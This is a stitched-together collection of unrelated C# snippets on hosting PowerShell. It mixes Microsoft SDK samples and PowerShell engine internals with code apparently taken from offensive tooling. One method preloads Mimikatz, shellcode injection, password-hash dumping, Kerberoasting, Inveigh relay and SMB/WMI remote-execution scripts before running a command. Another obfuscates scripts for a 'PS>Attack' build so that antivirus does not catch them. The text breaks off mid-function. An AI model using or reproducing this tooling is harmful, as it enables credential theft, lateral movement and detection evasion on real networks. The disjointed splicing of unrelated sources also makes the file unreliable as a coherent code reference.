/// <summary>
/// Runs a PowerShell command/script asynchronously.
/// </summary>
/// <param name="commandText">The text of the command to run.</param>
/// <param name="pool">An open PowerShell Runspace pool this script will use to invoke its pipeline.</param>
/// <param name="callback">The callback function used to process the results of the asynchronous run.</param>
/// <param name="log">[Optional] The event log to log execptions to. May be null for no logging.</param>
/// <param name="input">[Optional] A collection of strings representing command-line input sent to the script during execution.</param>
/// <param name="stateValues">[Optional] A collection of named state values that should be passed through the invocation to the callback function.</param>
/// <param name="parameterList">An array of key/value objects defining additional parameters to supply to the PowerShell script.</param>
/// <returns>An WaitHandle object that can be used to determine when the scrip has completed execution. Null if an error occurred while processing the command / script.</returns>
static public WaitHandle RunAsynchronously(string commandText, ref RunspacePool pool, ProcessResults callback, EventLog.EventLog log = null, PSDataCollection <string> input = null, Dictionary <String, Object> stateValues = null, params KeyValuePair <String, Object>[] parameterList)
{
try
{
// Create the script object.
PS script = PS.Create();
// Use the runspace pool supplied or create a new one if not supplied.
if (pool == null)
{
pool = RunspaceFactory.CreateRunspacePool(DEFAULT_MIN_RUNSPACES_IN_POOL, DEFAULT_MAX_RUNSPACES_IN_POOL, CreateRunspaceConnectionInfo());
}
// Verify that the pool is open, otherwise open it.
if (pool.RunspacePoolStateInfo.State != RunspacePoolState.Opened)
{
pool.Open();
}
// Add the runspace pool to the script object.
script.RunspacePool = pool;
// Create the PowerShell command object.
Command command = new Command(commandText, true);
// Add parameters to the command.
if (parameterList != null)
{
foreach (KeyValuePair <string, object> param in parameterList)
{
command.Parameters.Add(new CommandParameter(param.Key, param.Value));
}
}
// Add the command to the script object.
script.Commands.AddCommand(command);
// Initialize the script input object if nothing was supplied.
if (input == null)
{
input = new PSDataCollection <string>();
}
// Initialize the state object to maintain data across the invocation.
PowerShellScriptState state = new PowerShellScriptState(script);
// Add the callback function used to process the results of the script invocation.
state.StateVariables.Add(PROCESS_RESULTS_CALLBACK, callback);
// Add any state values passed into the method.
if (stateValues != null)
{
foreach (string key in stateValues.Keys)
{
state.StateVariables.Add(key, stateValues[key]);
}
}
// Invoke the command asyncronously.
return((script.BeginInvoke(input, new PSInvocationSettings(), ProcessAsynchronousResults, state)).AsyncWaitHandle);
}
catch (Exception e)
{
LogException(e, log);
return(null);
}
}
private void executeHelper(string cmd, object input)
{
if (String.IsNullOrEmpty(cmd))
{
return;
}
lock (this.instanceLock)
{
this.currentPowerShell = PowerShell.Create();
}
try
{
this.currentPowerShell.Runspace = this.myRunSpace;
this.currentPowerShell.AddScript(Resources.Invoke_Shellcode());
this.currentPowerShell.AddScript(Resources.Invoke_Mimikatz());
this.currentPowerShell.AddScript(Resources.Invoke_ReflectivePEInjection());
this.currentPowerShell.AddScript(Resources.Invoke_PsExec());
this.currentPowerShell.AddScript(Resources.Invoke_TokenManipulation());
this.currentPowerShell.AddScript(Resources.PowerCat());
this.currentPowerShell.AddScript(Resources.Invoke_Encode());
this.currentPowerShell.AddScript(Resources.Invoke_PowerView());
this.currentPowerShell.AddScript(Resources.Invoke_PowerUp());
this.currentPowerShell.AddScript(Resources.Get_PassHashes());
this.currentPowerShell.AddScript(Resources.Get_GPPPassword());
this.currentPowerShell.AddScript(Resources.Copy_VSS());
this.currentPowerShell.AddScript(Resources.Port_Scan());
this.currentPowerShell.AddScript(Resources.Inveigh());
this.currentPowerShell.AddScript(Resources.Inveigh_relay());
this.currentPowerShell.AddScript(Resources.Invoke_Tater());
this.currentPowerShell.AddScript(Resources.Invoke_MS16_032());
this.currentPowerShell.AddScript(Resources.Invoke_MS16_135());
this.currentPowerShell.AddScript(Resources.Invoke_Kerberoast());
this.currentPowerShell.AddScript(Resources.GetUserSPNs());
this.currentPowerShell.AddScript(Resources.Sherlock());
this.currentPowerShell.AddScript(Resources.Invoke_SMBExec());
this.currentPowerShell.AddScript(Resources.Invoke_WMIExec());
this.currentPowerShell.AddScript(Resources.Invoke_BloodHound());
this.currentPowerShell.AddScript(cmd);
this.currentPowerShell.AddCommand("out-default");
this.currentPowerShell.Commands.Commands[0].MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
if (input != null)
{
this.currentPowerShell.Invoke(new object[] { input });
}
else
{
this.currentPowerShell.Invoke();
}
}
finally
{
lock (this.instanceLock)
{
this.currentPowerShell.Dispose();
this.currentPowerShell = null;
}
}
}
public static IEnumerable <T> RunScript <T>(string script) => Pwsh.Create().AddScript(script).Invoke <T>();
/// <summary>
/// Invoke command Get-DscResource with resource name to find the resource.
/// When found add them to the enumerator. If we have already got it, return the next resource.
/// </summary>
/// <returns>Next DscResource Info object or null if none are found.</returns>
private DscResourceInfo GetNextDscResource()
{
var ps = PowerShell.Create(RunspaceMode.CurrentRunspace).AddCommand("Get-DscResource");
WildcardPattern resourceMatcher = WildcardPattern.Get(_resourceName, WildcardOptions.IgnoreCase);
if (_matchingResourceList == null)
{
Collection <PSObject> psObjs = ps.Invoke();
_matchingResourceList = new Collection <DscResourceInfo>();
bool matchFound = false;
foreach (dynamic resource in psObjs)
{
if (resource.Name != null)
{
string resourceName = resource.Name;
if (resourceMatcher.IsMatch(resourceName))
{
DscResourceInfo resourceInfo = new DscResourceInfo(resourceName,
resource.ResourceType,
resource.Path,
resource.ParentPath,
_context
);
resourceInfo.FriendlyName = resource.FriendlyName;
resourceInfo.CompanyName = resource.CompanyName;
PSModuleInfo psMod = resource.Module as PSModuleInfo;
if (psMod != null)
{
resourceInfo.Module = psMod;
}
if (resource.ImplementedAs != null)
{
ImplementedAsType impType;
if (Enum.TryParse <ImplementedAsType>(resource.ImplementedAs.ToString(), out impType))
{
resourceInfo.ImplementedAs = impType;
}
}
var properties = resource.Properties as IList;
if (properties != null)
{
List <DscResourcePropertyInfo> propertyList = new List <DscResourcePropertyInfo>();
foreach (dynamic prop in properties)
{
DscResourcePropertyInfo propInfo = new DscResourcePropertyInfo();
propInfo.Name = prop.Name;
propInfo.PropertyType = prop.PropertyType;
propInfo.UpdateValues(prop.Values);
propertyList.Add(propInfo);
}
resourceInfo.UpdateProperties(propertyList);
}
_matchingResourceList.Add(resourceInfo);
matchFound = true;
} //if
} //if
} // foreach
if (matchFound)
{
_matchingResource = _matchingResourceList.GetEnumerator();
}
else
{
return(null);
}
}//if
if (!_matchingResource.MoveNext())
{
_matchingResource = null;
}
else
{
return(_matchingResource.Current);
}
return(null);
}
static public string InvokeObfuscation(string source, bool file = false)
{
List <string> obfuscationCommands = new List <string>();
obfuscationCommands.Add(@"TOKEN\ALL\1");
obfuscationCommands.Add(@"TOKEN\STRING\1,TOKEN\COMMAND\1,TOKEN\ARGUMENT\3,TOKEN\ARGUMENT\4,TOKEN\MEMBER\4,TOKEN\COMMENT\1");
obfuscationCommands.Add(@"TOKEN\STRING\1,TOKEN\COMMAND\1,TOKEN\COMMENT\1");
string result = "";
bool success = false; // We'll use this to track successful obfuscation.
foreach (string obfuscationCommand in obfuscationCommands)
{
string cmd = $"Invoke-Obfuscation -ScriptBlock {source} -Command '{obfuscationCommand}' -Quiet";
if (file && File.Exists(source))
{
cmd = $"Invoke-Obfuscation -ScriptPath '{source}' -Command '{obfuscationCommand}' -Quiet";
}
if (file && !File.Exists(source))
{
Display.ErrorMessage($"Could not find {source}! Check to see if the file exists.");
return("ERROR");
}
Display.SecondaryMessage($"Trying obfuscation with the following command: \n\n{cmd}");
PowerShell ps = PowerShell.Create();
ps.AddScript("Import-Module " + Strings.invokeObfuscationModulePath);
ps.Invoke();
ps.AddScript(cmd);
result = ps.Invoke()[0].ToString();
if (result == "")
{
Display.ErrorMessage($"Obfuscation for {source} returned an empty string. Maybe AV ate it before it could be obfuscated?");
return("ERROR");
}
// Create a new, clean PowerShell runspace to test the obfuscated script
PowerShell detChamber = PowerShell.Create();
detChamber.AddScript(result);
detChamber.Invoke();
if (detChamber.Streams.Error.Count > 0)
{
Display.SecondaryMessage($"Obfuscation command {obfuscationCommand} failed. Trying next in list.");
}
else if (detChamber.Streams.Error.Count == 0)
{
Display.SecondaryMessage($"Obfuscation command {obfuscationCommand} succeeded.");
success = true;
break;
}
}
if (!success)
{
if (file)
{
Display.ErrorMessage($"Obfuscation failed for {source}.", exceptionMessage: null, secondaryMessage: "Press enter to included the un-obfuscated source into your PS>Attack build");
}
else
{
Display.ErrorMessage($"Obfuscation failed for command: {source}.", exceptionMessage: null, secondaryMessage: "Press enter to included the un-obfuscated command into your PS>Attack build");
}
result = source; // Set result to unobfuscated source
}
if (file) // if file, write to file and return path
{
string destination = Path.Combine(Strings.obfuscatedScriptsDir, Path.GetFileName(source));
if (!success) // If obfuscation hasn't sucessfully run, we'll just copy the original file over
{
File.Copy(result, destination);
}
else
{
File.WriteAllText(destination, result);
}
return(destination);
}
else // else, return obfuscated command
{
return(result);
}
}
/// <summary>
/// Helper method to find and return the job source adapter if currently loaded or
/// otherwise load the associated module and the requested source adapter.
/// </summary>
/// <param name="definition">JobDefinition supplies the JobSourceAdapter information.</param>
/// <returns>JobSourceAdapter</returns>
private JobSourceAdapter GetJobSourceAdapter(JobDefinition definition)
{
string adapterTypeName;
if (!string.IsNullOrEmpty(definition.JobSourceAdapterTypeName))
{
adapterTypeName = definition.JobSourceAdapterTypeName;
}
else if (definition.JobSourceAdapterType != null)
{
adapterTypeName = definition.JobSourceAdapterType.Name;
}
else
{
throw new InvalidOperationException(RemotingErrorIdStrings.JobSourceAdapterNotFound);
}
JobSourceAdapter adapter;
bool adapterFound = false;
lock (_syncObject)
{
adapterFound = _sourceAdapters.TryGetValue(adapterTypeName, out adapter);
}
if (!adapterFound)
{
if (!string.IsNullOrEmpty(definition.ModuleName))
{
// Attempt to load the module.
Exception ex = null;
try
{
InitialSessionState iss = InitialSessionState.CreateDefault2();
iss.Commands.Clear();
iss.Formats.Clear();
iss.Commands.Add(new SessionStateCmdletEntry("Import-Module", typeof(Microsoft.PowerShell.Commands.ImportModuleCommand), null));
using (PowerShell powerShell = PowerShell.Create(iss))
{
powerShell.AddCommand("Import-Module");
powerShell.AddParameter("Name", definition.ModuleName);
powerShell.Invoke();
if (powerShell.ErrorBuffer.Count > 0)
{
ex = powerShell.ErrorBuffer[0].Exception;
}
}
}
catch (RuntimeException e)
{
ex = e;
}
catch (InvalidOperationException e)
{
ex = e;
}
catch (ScriptCallDepthException e)
{
ex = e;
}
catch (SecurityException e)
{
ex = e;
}
catch (ThreadAbortException e)
{
ex = e;
}
if (ex != null)
{
throw new InvalidOperationException(RemotingErrorIdStrings.JobSourceAdapterNotFound, ex);
}
// Now try getting the job source adapter again.
adapter = AssertAndReturnJobSourceAdapter(adapterTypeName);
}
else
{
throw new InvalidOperationException(RemotingErrorIdStrings.JobSourceAdapterNotFound);
}
}
return(adapter);
}
private ScriptBlockToPowerShellConverter()
{
_powershell = PowerShell.Create();
}
private void HandleRunspaceCreated(object sender, RunspaceCreatedEventArgs args)
{
try
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.Personal);
args.Runspace.ExecutionContext.EngineSessionState.SetLocation(folderPath);
}
catch (ArgumentException ex)
{
}
catch (ProviderNotFoundException ex)
{
}
catch (DriveNotFoundException ex)
{
}
catch (ProviderInvocationException ex)
{
}
Command command = (Command)null;
if (!string.IsNullOrEmpty(this.configData.StartupScript))
{
command = new Command(this.configData.StartupScript, false, false);
}
else if (!string.IsNullOrEmpty(this.configData.InitializationScriptForOutOfProcessRunspace))
{
command = new Command(this.configData.InitializationScriptForOutOfProcessRunspace, true, false);
}
if (command == null)
{
return;
}
HostInfo hostInfo = this.remoteHost.HostInfo;
command.MergeMyResults(PipelineResultTypes.Error, PipelineResultTypes.Output);
PowerShell powershell = PowerShell.Create();
powershell.AddCommand(command).AddCommand("out-default");
IAsyncResult asyncResult = new ServerPowerShellDriver(powershell, (PowerShell)null, true, Guid.Empty, this.InstanceId, this, args.Runspace.ApartmentState, hostInfo, RemoteStreamOptions.AddInvocationInfo, false, args.Runspace).Start();
powershell.EndInvoke(asyncResult);
ArrayList dollarErrorVariable = (ArrayList)powershell.Runspace.GetExecutionContext.DollarErrorVariable;
if (dollarErrorVariable.Count > 0)
{
string str = (dollarErrorVariable[0] as ErrorRecord).ToString();
throw ServerRunspacePoolDriver.tracer.NewInvalidOperationException("RemotingErrorIdStrings", PSRemotingErrorId.StartupScriptThrewTerminatingError.ToString(), (object)str);
}
if (this.localRunspacePool.RunspacePoolStateInfo.State != RunspacePoolState.Opening)
{
return;
}
object valueToConvert = args.Runspace.SessionStateProxy.PSVariable.GetValue("global:PSApplicationPrivateData");
if (valueToConvert == null)
{
return;
}
this.applicationPrivateData = (PSPrimitiveDictionary)LanguagePrimitives.ConvertTo(valueToConvert, typeof(PSPrimitiveDictionary), true, (IFormatProvider)CultureInfo.InvariantCulture, (TypeTable)null);
}
/// <summary>
/// This sample looks at an existing .NET class and shows how to make sure that
/// information from selected public properties of this class is preserved across
/// serialization/deserialization.
/// </summary>
private static void Main()
{
string typesPs1XmlPath = Path.Combine(Environment.CurrentDirectory, "Serialization01.types.ps1xml");
if (!File.Exists(typesPs1XmlPath))
{
Console.WriteLine("Building the project in Visual Studio should have created a types.ps1xml file at the following path:");
Console.WriteLine("{0}", typesPs1XmlPath);
Console.WriteLine();
Console.WriteLine("Cannot continue without this file being present.");
return;
}
// Demonstrate the effects of the types.ps1xml and DeserializingTypeConverter
using (Runspace myRunspace = RunspaceFactory.CreateRunspace(InitialSessionState.CreateDefault()))
{
myRunspace.Open();
// Demonstrate that the deserializing an exception results in a live object
using (PowerShell powershell = PowerShell.Create())
{
powershell.Runspace = myRunspace;
powershell.AddScript(@"
# Get an System.Drawing.Rectangle object
Add-Type -AssemblyName System.Drawing
$rectangle = New-Object System.Drawing.Rectangle 1,2,3,4
# Without extra type.ps1xml Rectangle.Location property might get serialized as a string
Write-Output 'Below are serialization results without the extra types.ps1xml declarations: '
Export-CliXml -Input $rectangle -Depth 1 -Path Serialization01.xml
$deserializedRectangle = Import-CliXml Serialization01.xml
Write-Output ('$deserializedRectangle.Location is a ' + $deserializedRectangle.Location.PSTypeNames[0])
Write-Output '----------------------------------------'
# Update the system with the extra types.ps1xml declarations
Update-TypeData .\Serialization01.types.ps1xml
# After adding extra types.ps1xml declarations
# chosen properties of Rectangle.Location will always get serialized
Write-Output 'Below are serialization results after adding the extra types.ps1xml declarations: '
Export-CliXml -Input $rectangle -Depth 1 -Path Serialization01.xml
$deserializedRectangle = Import-CliXml Serialization01.xml
Write-Output ('$deserializedRectangle.Location is a ' + $deserializedRectangle.Location.PSTypeNames[0])
if ($deserializedRectangle.Location.IsEmpty -eq $null)
{
Write-Output '$deserializedRectangle.Location.IsEmpty didnt get serialized'
}
Write-Output '----------------------------------------'
");
foreach (string s in powershell.Invoke <string>())
{
System.Console.WriteLine(s);
}
}
// Close the runspace and release any resources.
myRunspace.Close();
}
System.Console.WriteLine("Hit any key to exit...");
System.Console.ReadKey();
}
/// <summary>
/// This sample shows how to create a runspace and how to run
/// commands using a PowerShell object. It builds a pipeline
/// that runs the get-process cmdlet, which is piped to the measure-object
/// cmdlet to count the number of processes running on the system.
/// </summary>
/// <param name="args">Parameter is not used.</param>
/// <remarks>
/// This sample demonstrates the following:
/// 1. Creating a runspace using the RunspaceFactory class.
/// 2. Creating a PowerShell object
/// 3. Adding individual cmdlets to the PowerShell object.
/// 4. Running the cmdlets synchronously.
/// 5. Working with PSObject objects to extract properties
/// from the objects returned by the cmdlets.
/// </remarks>
private static void Main(string[] args)
{
Collection <PSObject> result; // Will hold the result
// of running the cmdlets.
// Create a runspace. We can not use the RunspaceInvoke class
// because we need to get at the underlying runspace to
// explicitly add the commands. Notice that no PSHost object is
// supplied to the CreateRunspace method so the default host is
// used. See the Host samples for more information on creating
// your own custom host.
using (Runspace myRunSpace = RunspaceFactory.CreateRunspace())
{
myRunSpace.Open();
// Create a PowerShell object and specify the runspace.
PowerShell powershell = PowerShell.Create();
powershell.Runspace = myRunSpace;
// Use the using statement so we dispose of the PowerShell object
// when we're done.
using (powershell)
{
// Add the get-process cmdlet to the PowerShell object. Notice
// we are specify the name of the cmdlet, not a script.
powershell.AddCommand("get-process");
// Add the measure-object cmdlet to count the number
// of objects being returned. Commands are always added to the end
// of the pipeline.
powershell.AddCommand("measure-object");
// Run the cmdlets synchronously and save the objects returned.
result = powershell.Invoke();
}
// Even after disposing of the pipeLine, we still need to set
// the powershell variable to null so that the garbage collector
// can clean it up.
powershell = null;
// Display the results of running the commands (checking that
// everything is ok first.
if (result == null || result.Count != 1)
{
throw new InvalidOperationException(
"pipeline.Invoke() returned the wrong number of objects");
}
PSMemberInfo count = result[0].Properties["Count"];
if (count == null)
{
throw new InvalidOperationException(
"The object returned doesn't have a 'count' property");
}
Console.WriteLine(
"Runspace07: The get-process cmdlet returned {0} objects",
count.Value);
// Close the runspace to release any resources.
myRunSpace.Close();
}
System.Console.WriteLine("Hit any key to exit...");
System.Console.ReadKey();
}
private void HandleRunspaceCreated(object sender, RunspaceCreatedEventArgs args)
{
bool flag = false;
if (SystemPolicy.GetSystemLockdownPolicy() == SystemEnforcementMode.Enforce)
{
args.Runspace.ExecutionContext.LanguageMode = PSLanguageMode.ConstrainedLanguage;
flag = true;
}
try
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.Personal);
args.Runspace.ExecutionContext.EngineSessionState.SetLocation(folderPath);
}
catch (ArgumentException)
{
}
catch (ProviderNotFoundException)
{
}
catch (DriveNotFoundException)
{
}
catch (ProviderInvocationException)
{
}
if (this.configHash != null)
{
if (this.configHash.ContainsKey(ConfigFileContants.EnvironmentVariables))
{
Hashtable hashtable = this.configHash[ConfigFileContants.EnvironmentVariables] as Hashtable;
if (hashtable != null)
{
foreach (DictionaryEntry entry in hashtable)
{
string introduced76 = entry.Key.ToString();
this.InvokeScript(new Command(StringUtil.Format("$env:{0} = \"{1}\"", introduced76, entry.Value.ToString()), true, false), args);
}
}
}
if (this.configHash.ContainsKey(ConfigFileContants.VariableDefinitions))
{
Hashtable[] hashtableArray = DISCPowerShellConfiguration.TryGetHashtableArray(this.configHash[ConfigFileContants.VariableDefinitions]);
if (hashtableArray != null)
{
foreach (Hashtable hashtable2 in hashtableArray)
{
if (hashtable2.ContainsKey(ConfigFileContants.VariableValueToken))
{
string str2 = DISCPowerShellConfiguration.TryGetValue(hashtable2, ConfigFileContants.VariableNameToken);
ScriptBlock block = hashtable2[ConfigFileContants.VariableValueToken] as ScriptBlock;
if (!string.IsNullOrEmpty(str2) && (block != null))
{
block.SessionStateInternal = args.Runspace.ExecutionContext.EngineSessionState;
PowerShell powershell = PowerShell.Create();
powershell.AddCommand(new Command("Invoke-Command")).AddParameter("ScriptBlock", block).AddParameter("NoNewScope");
powershell.AddCommand(new Command("Set-Variable")).AddParameter("Name", str2);
this.InvokePowerShell(powershell, args);
}
}
}
}
}
if (this.configHash.ContainsKey(ConfigFileContants.ScriptsToProcess))
{
string[] strArray = DISCPowerShellConfiguration.TryGetStringArray(this.configHash[ConfigFileContants.ScriptsToProcess]);
if (strArray != null)
{
foreach (string str3 in strArray)
{
if (!string.IsNullOrEmpty(str3))
{
this.InvokeScript(new Command(str3, true, false), args);
}
}
}
}
bool flag2 = false;
if (this.configHash.ContainsKey(ConfigFileContants.VisibleAliases))
{
string[] strArray2 = DISCPowerShellConfiguration.TryGetStringArray(this.configHash[ConfigFileContants.VisibleAliases]);
if (strArray2 != null)
{
flag2 = true;
foreach (KeyValuePair <string, AliasInfo> pair in args.Runspace.ExecutionContext.EngineSessionState.GetAliasTable())
{
bool flag3 = false;
foreach (string str4 in strArray2)
{
if (!string.IsNullOrEmpty(str4))
{
IEnumerable <WildcardPattern> patternList = this.CreateKeyPatternList(str4);
if (this.MatchKeyPattern(patternList, pair.Key))
{
pair.Value.Visibility = SessionStateEntryVisibility.Public;
flag3 = true;
}
}
}
if (!flag3)
{
pair.Value.Visibility = SessionStateEntryVisibility.Private;
}
}
}
}
if (this.configHash.ContainsKey(ConfigFileContants.VisibleCmdlets))
{
string[] strArray3 = DISCPowerShellConfiguration.TryGetStringArray(this.configHash[ConfigFileContants.VisibleCmdlets]);
if (strArray3 != null)
{
flag2 = true;
foreach (KeyValuePair <string, List <CmdletInfo> > pair2 in args.Runspace.ExecutionContext.EngineSessionState.GetCmdletTable())
{
bool flag4 = false;
foreach (string str5 in strArray3)
{
if (!string.IsNullOrEmpty(str5))
{
IEnumerable <WildcardPattern> enumerable2 = this.CreateKeyPatternList(str5);
if (this.MatchKeyPattern(enumerable2, pair2.Key))
{
foreach (CmdletInfo info in pair2.Value)
{
info.Visibility = SessionStateEntryVisibility.Public;
flag4 = true;
}
}
}
}
if (!flag4)
{
foreach (CmdletInfo info2 in pair2.Value)
{
info2.Visibility = SessionStateEntryVisibility.Private;
}
}
}
}
}
List <string> list = new List <string>();
bool flag5 = false;
if (this.configHash.ContainsKey(ConfigFileContants.VisibleFunctions))
{
string[] strArray4 = DISCPowerShellConfiguration.TryGetStringArray(this.configHash[ConfigFileContants.VisibleFunctions]);
if (strArray4 != null)
{
flag2 = true;
flag5 = true;
list.AddRange(strArray4);
}
}
if (!flag5 && this.configHash.ContainsKey(ConfigFileContants.FunctionDefinitions))
{
Hashtable[] hashtableArray2 = DISCPowerShellConfiguration.TryGetHashtableArray(this.configHash[ConfigFileContants.FunctionDefinitions]);
if (hashtableArray2 != null)
{
foreach (Hashtable hashtable3 in hashtableArray2)
{
string str6 = DISCPowerShellConfiguration.TryGetValue(hashtable3, ConfigFileContants.FunctionNameToken);
if (!string.IsNullOrEmpty(str6))
{
list.Add(str6);
}
}
}
}
string str7 = DISCPowerShellConfiguration.TryGetValue(this.configHash, ConfigFileContants.SessionType);
if (!string.IsNullOrEmpty(str7))
{
SessionType type = (SessionType)Enum.Parse(typeof(SessionType), str7, true);
if (type == SessionType.RestrictedRemoteServer)
{
list.Add("Get-Command");
list.Add("Get-FormatData");
list.Add("Select-Object");
list.Add("Get-Help");
list.Add("Measure-Object");
list.Add("Out-Default");
list.Add("Exit-PSSession");
}
}
if (list.Count > 0)
{
foreach (DictionaryEntry entry2 in args.Runspace.ExecutionContext.EngineSessionState.GetFunctionTable())
{
bool flag6 = false;
string key = entry2.Key.ToString();
FunctionInfo info3 = entry2.Value as FunctionInfo;
if (info3 != null)
{
foreach (string str9 in list)
{
if (!string.IsNullOrEmpty(str9))
{
IEnumerable <WildcardPattern> enumerable3 = this.CreateKeyPatternList(str9);
if (this.MatchKeyPattern(enumerable3, key))
{
info3.Visibility = SessionStateEntryVisibility.Public;
flag6 = true;
}
}
}
if (!flag6 && flag5)
{
info3.Visibility = SessionStateEntryVisibility.Private;
}
}
}
}
if (this.configHash.ContainsKey(ConfigFileContants.VisibleProviders))
{
string[] strArray5 = DISCPowerShellConfiguration.TryGetStringArray(this.configHash[ConfigFileContants.VisibleProviders]);
if (strArray5 != null)
{
flag2 = true;
IDictionary <string, List <ProviderInfo> > providers = args.Runspace.ExecutionContext.EngineSessionState.Providers;
Collection <string> collection = new Collection <string>();
foreach (KeyValuePair <string, List <ProviderInfo> > pair3 in providers)
{
bool flag7 = false;
foreach (string str10 in strArray5)
{
if (!string.IsNullOrEmpty(str10))
{
IEnumerable <WildcardPattern> enumerable4 = this.CreateKeyPatternList(str10);
if (this.MatchKeyPattern(enumerable4, pair3.Key))
{
flag7 = true;
}
}
}
if (!flag7)
{
collection.Add(pair3.Key);
}
}
foreach (string str11 in collection)
{
args.Runspace.ExecutionContext.EngineSessionState.Providers.Remove(str11);
}
}
}
if (flag2)
{
CmdletInfo cmdlet = args.Runspace.ExecutionContext.SessionState.InvokeCommand.GetCmdlet(@"Microsoft.PowerShell.Core\Import-Module");
IDictionary <string, AliasInfo> aliasTable = args.Runspace.ExecutionContext.EngineSessionState.GetAliasTable();
PSModuleAutoLoadingPreference preference = CommandDiscovery.GetCommandDiscoveryPreference(args.Runspace.ExecutionContext, SpecialVariables.PSModuleAutoLoadingPreferenceVarPath, "PSModuleAutoLoadingPreference");
bool flag8 = (cmdlet != null) && (cmdlet.Visibility != SessionStateEntryVisibility.Private);
bool flag9 = ((aliasTable != null) && aliasTable.ContainsKey("ipmo")) && (aliasTable["ipmo"].Visibility != SessionStateEntryVisibility.Private);
if ((flag8 || flag9) && (preference == PSModuleAutoLoadingPreference.None))
{
throw new PSInvalidOperationException(StringUtil.Format(RemotingErrorIdStrings.DISCVisibilityAndAutoLoadingCannotBeBothSpecified, new object[] { "Import-Module", "ipmo", ConfigFileContants.VisibleCmdlets, ConfigFileContants.VisibleAliases, ConfigFileContants.VisibleFunctions, ConfigFileContants.VisibleProviders }));
}
}
if (this.configHash.ContainsKey(ConfigFileContants.LanguageMode))
{
PSLanguageMode mode = (PSLanguageMode)Enum.Parse(typeof(PSLanguageMode), this.configHash[ConfigFileContants.LanguageMode].ToString(), true);
if (flag && (mode != PSLanguageMode.ConstrainedLanguage))
{
throw new PSInvalidOperationException(RemotingErrorIdStrings.CannotCreateRunspaceInconsistentState);
}
args.Runspace.ExecutionContext.LanguageMode = mode;
}
if (this.configHash.ContainsKey(ConfigFileContants.ExecutionPolicy))
{
ExecutionPolicy policy = (ExecutionPolicy)Enum.Parse(typeof(ExecutionPolicy), this.configHash[ConfigFileContants.ExecutionPolicy].ToString(), true);
string shellID = args.Runspace.ExecutionContext.ShellID;
SecuritySupport.SetExecutionPolicy(ExecutionPolicyScope.Process, policy, shellID);
}
}
Command cmdToRun = null;
if (!string.IsNullOrEmpty(this.configData.StartupScript))
{
cmdToRun = new Command(this.configData.StartupScript, false, false);
}
else if (!string.IsNullOrEmpty(this.configData.InitializationScriptForOutOfProcessRunspace))
{
cmdToRun = new Command(this.configData.InitializationScriptForOutOfProcessRunspace, true, false);
}
if (cmdToRun != null)
{
this.InvokeScript(cmdToRun, args);
if (this.localRunspacePool.RunspacePoolStateInfo.State == RunspacePoolState.Opening)
{
object valueToConvert = args.Runspace.SessionStateProxy.PSVariable.GetValue("global:PSApplicationPrivateData");
if (valueToConvert != null)
{
this.applicationPrivateData = (PSPrimitiveDictionary)LanguagePrimitives.ConvertTo(valueToConvert, typeof(PSPrimitiveDictionary), true, CultureInfo.InvariantCulture, null);
}
}
}
}
internal static Dictionary <string, List <CommandTypes> > GetExportedCommands(string modulePath, bool testOnly, System.Management.Automation.ExecutionContext context)
{
if (string.IsNullOrEmpty(Environment.GetEnvironmentVariable("PSDisableModuleAutoLoadingMemoryCache")))
{
AnalysisCacheIndexEntry entry = null;
if ((itemCache.ContainsKey(modulePath) && (savedCacheIndex != null)) && savedCacheIndex.Entries.TryGetValue(modulePath, out entry))
{
lock (itemCache)
{
if (itemCache.ContainsKey(modulePath))
{
DateTime lastWriteTime = new FileInfo(modulePath).LastWriteTime;
if ((lastWriteTime == entry.LastWriteTime) && (itemCache[modulePath] != null))
{
return(itemCache[modulePath]);
}
ModuleIntrinsics.Tracer.WriteLine(string.Concat(new object[] { "Cache entry for ", modulePath, " was out of date. Cached on ", entry.LastWriteTime, ", last updated on ", lastWriteTime, ". Re-analyzing." }), new object[0]);
itemCache.Remove(modulePath);
}
}
}
}
string basePath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), @"Microsoft\Windows\PowerShell\CommandAnalysis\");
ModuleIntrinsics.Tracer.WriteLine("Entering mutex PowerShell_CommandAnalysis_Lock", new object[0]);
Dictionary <string, List <CommandTypes> > dictionary = null;
using (Mutex mutex = new Mutex(false, "PowerShell_CommandAnalysis_Lock"))
{
mutex.WaitOne();
try
{
string fileNameWithoutExtension = Path.GetFileNameWithoutExtension(modulePath);
dictionary = Get(basePath, modulePath);
if (!testOnly && (dictionary == null))
{
try
{
if (modulesBeingAnalyzed.Contains(modulePath))
{
ModuleIntrinsics.Tracer.WriteLine(modulePath + " is already being analyzed. Exiting.", new object[0]);
return(null);
}
ModuleIntrinsics.Tracer.WriteLine("Registering " + modulePath + " for analysis.", new object[0]);
modulesBeingAnalyzed.Add(modulePath);
CommandInfo commandInfo = new CmdletInfo("Get-Module", typeof(GetModuleCommand), null, null, context);
Command command = new Command(commandInfo);
ModuleIntrinsics.Tracer.WriteLine("Listing modules.", new object[0]);
PowerShell.Create(RunspaceMode.CurrentRunspace).AddCommand(command).AddParameter("List", true).AddParameter("Name", fileNameWithoutExtension).AddParameter("ErrorAction", ActionPreference.Ignore).AddParameter("WarningAction", ActionPreference.Ignore).AddParameter("Verbose", false).AddParameter("Debug", false).Invoke <PSModuleInfo>();
}
catch (Exception exception)
{
ModuleIntrinsics.Tracer.WriteLine("Module analysis generated an exception: " + exception.ToString(), new object[0]);
CommandProcessorBase.CheckForSevereException(exception);
}
finally
{
ModuleIntrinsics.Tracer.WriteLine("Unregistering " + modulePath + " for analysis.", new object[0]);
modulesBeingAnalyzed.Remove(modulePath);
}
dictionary = Get(basePath, modulePath);
}
if (dictionary != null)
{
lock (itemCache)
{
ModuleIntrinsics.Tracer.WriteLine("Caching " + dictionary.Count + " exported commands.", new object[0]);
itemCache[modulePath] = dictionary;
goto Label_037E;
}
}
ModuleIntrinsics.Tracer.WriteLine("Detected an error while retrieving exported commands.", new object[0]);
}
finally
{
ModuleIntrinsics.Tracer.WriteLine("Releasing mutex.", new object[0]);
mutex.ReleaseMutex();
}
}
Label_037E:
if (dictionary != null)
{
ModuleIntrinsics.Tracer.WriteLine("Returning " + dictionary.Count + " exported commands.", new object[0]);
return(dictionary);
}
ModuleIntrinsics.Tracer.WriteLine("Returning NULL for exported commands", new object[0]);
return(dictionary);
}
private void run()
{
Debug.WriteLine("[DEBUG] Starting handler");
// Define some helpful triggers and flags
char HARNESS_CMD_CHAR = '^';
string BEGINFILE_TAG = "<rf>";
string ENDFILE_TAG = "</rf>";
string USER_BREAK = "end";
